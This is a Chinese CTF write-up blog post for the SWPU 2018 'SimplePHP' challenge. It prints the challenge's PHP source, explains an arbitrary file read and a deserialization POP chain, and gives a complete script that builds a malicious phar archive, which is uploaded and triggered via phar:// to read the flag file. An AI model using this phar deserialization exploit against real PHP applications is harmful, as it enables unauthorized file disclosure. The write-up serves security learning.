[SWPU 2018]SimplePHP

最新推荐文章于 2024-01-27 16:06:56 发布
最新推荐文章于 2024-01-27 16:06:56 发布
阅读量112 收藏
点赞数
文章标签: php html css web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129962973
版权

1.打开环境

在查看文件区域发现?file=结果有文件任意读取的漏洞,可以获取相关文件源码。

base.php:

<?php 
    session_start(); 
?> 
<!DOCTYPE html> 
<html> 
<head> 
    <meta charset="utf-8"> 
    <title>web3</title> 
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css"> 
    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script> 
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script> 
</head> 
<body> 
    <nav class="navbar navbar-default" role="navigation"> 
        <div class="container-fluid"> 
        <div class="navbar-header"> 
            <a class="navbar-brand" href="index.php">首页</a> 
        </div> 
            <ul class="nav navbar-nav navbra-toggle"> 
                <li class="active"><a href="file.php?file=">查看文件</a></li> 
                <li><a href="upload_file.php">上传文件</a></li> 
            </ul> 
            <ul class="nav navbar-nav navbar-right"> 
                <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li> 
            </ul> 
        </div> 
    </nav> 
</body> 
</html> 
<!--flag is in f1ag.php-->

提示flag在f1ag.php里。

class.php:

 <?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

upload_file.php:

<?php 
include 'function.php'; 
upload_file(); 
?> 
<html> 
<head> 
<meta charest="utf-8"> 
<title>文件上传</title> 
</head> 
<body> 
<div align = "center"> 
        <h1>前端写得很low,请各位师傅见谅!</h1> 
</div> 
<style> 
    p{ margin:0 auto} 
</style> 
<div> 
<form action="upload_file.php" method="post" enctype="multipart/form-data"> 
    <label for="file">文件名:</label> 
    <input type="file" name="file" id="file"><br> 
    <input type="submit" name="submit" value="提交"> 
</div> 

</script> 
</body> 
</html>

而在upload_file.php中,include了class.php,在class.php中有危险函数file_get_content,构造pop链C1e4r->destruct=>Show->__toString=>Test->__get->file_get(),其中__get在类被[]引用时会触发,且$key=source

phar序列化的php脚本:

<?php
class C1e4r
{
    public $test;
    public $str ;
    
}

class Show
{
    public $source;
    public $str;
    
}
class Test
{
    public $file;
    public $params;
}
$c1e4r = new C1e4r();
$show = new Show();
$c1e4r->str=$show;
$test = new Test();
$show->str=array("str"=>$test);
$test->params=array("source"=>'/var/www/html/f1ag.php');

$phar = new Phar("ddd.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");
$phar->setMetadata($c1e4r);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
?>

改名上传后用phar://伪协议读取flag。

ha0cker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SWPU大数据概论课程报告
01-31
仅作备份
[SWPUCTF 2018]SimplePHP
snowlyzz的博客
09-06 707
phar 反序列化
[SWPUCTF 2018]SimplePHP 1
weixin_46245411的博客
08-02 771
文章目录 一、获取源码 二、分析pop链 三、读取文件 总结 一、获取源码 开局三个页面,但是在“查看文件”部分发现网页在通过GET方式读取页面源码 试着读取“index.php” http://bbe726aa-c930-42b2-b1bc-e877e7cc731f.node4.buuoj.cn/file.php?file=index.php 同理,发现了新的PHP文件继续读取文件源码 总计6个页面:“function.php” "inde...
[SWPUCTF 2018]SimplePHP1
最新发布
qq_34942239的博客
01-27 432
看一下参数,$value由params[$key]得到,$key由出发__get函数时传入,可以控制params和key使得$value=f1ag.php。file_get函数由get触发,get由__get触发,当指向类中不存在的变量时候可以出发__get魔法函数。有file_get_contents()是不是可以通过构造pop链,实现读取f1ag.php呢。有查看文件跟上传文件,查看文件里面显示没有文件url貌似可以文件读取。/etc/passwd不能读取,源码提示flag在f1ag.php
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU学分绩点计算器2009版
01-19
西南石油大学学分计算器,选择好专业年级后,就可以录入分数,学分以输入好的,完成后回车即显示学分绩点
swpu前端实验4的实验
04-23
swpu
swpu考试系统
07-01
swpu考试系统,内部的系统
SWPUCT 2018SimplePHP
抒情诗
10-23 374
tags: [phar反序列化, ctf, web] 拿下代码 先通过查看文件的功能拿下全部的文件代码,分别是index.php、base.php、file.php、upload_file.php、function.php、class.php。然后粗略看下代码,有个提示(不知道是不是后面放上去的),就是class.php那里。 <?php class C1e4r { public $test; public $str; public function __construct($
[SWPUCTF 2018]SimplePHP(phar反序列化)
paidx0
11-06 3149
首先看到是个文件上传,先看源码,源码里有个file.php?file= 可以读文件,简单的都看了一下,主要注意力放在 class.php 和 function.php function.php <?php //show_source(__FILE__); include "base.php"; header("Content-type: text/html;charset=utf-8"); error_reporting(0); function upload_file_do() { .
Linux文件操作
agoud44884的专栏
05-26 104
1)查看文件内容   more   filename   //通过敲回车方式逐行查看文件的内容,默认从第一行开始查看,不支持回看,q 退出查看   less   filename  //通过“上下左右”键查看文件的各个部分内容,支持回看,q退出   head -n filename  //查看文件的前n行内容   tail -n  filename  //查...
[SWPUCTF 2018]SimplePHP phar漏洞及其文件上传
qq_54929891的博客
03-27 3206
在查看文件这个页面发现一个可疑参数file,试试能不能读取源代码 根据include包含来将各个文件源代码都提取出来,最重要的是class.php <?php class C1e4r { public $test; public $str; public function __destruct() { $this->test = $this->str; echo $this->test; } } ..

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值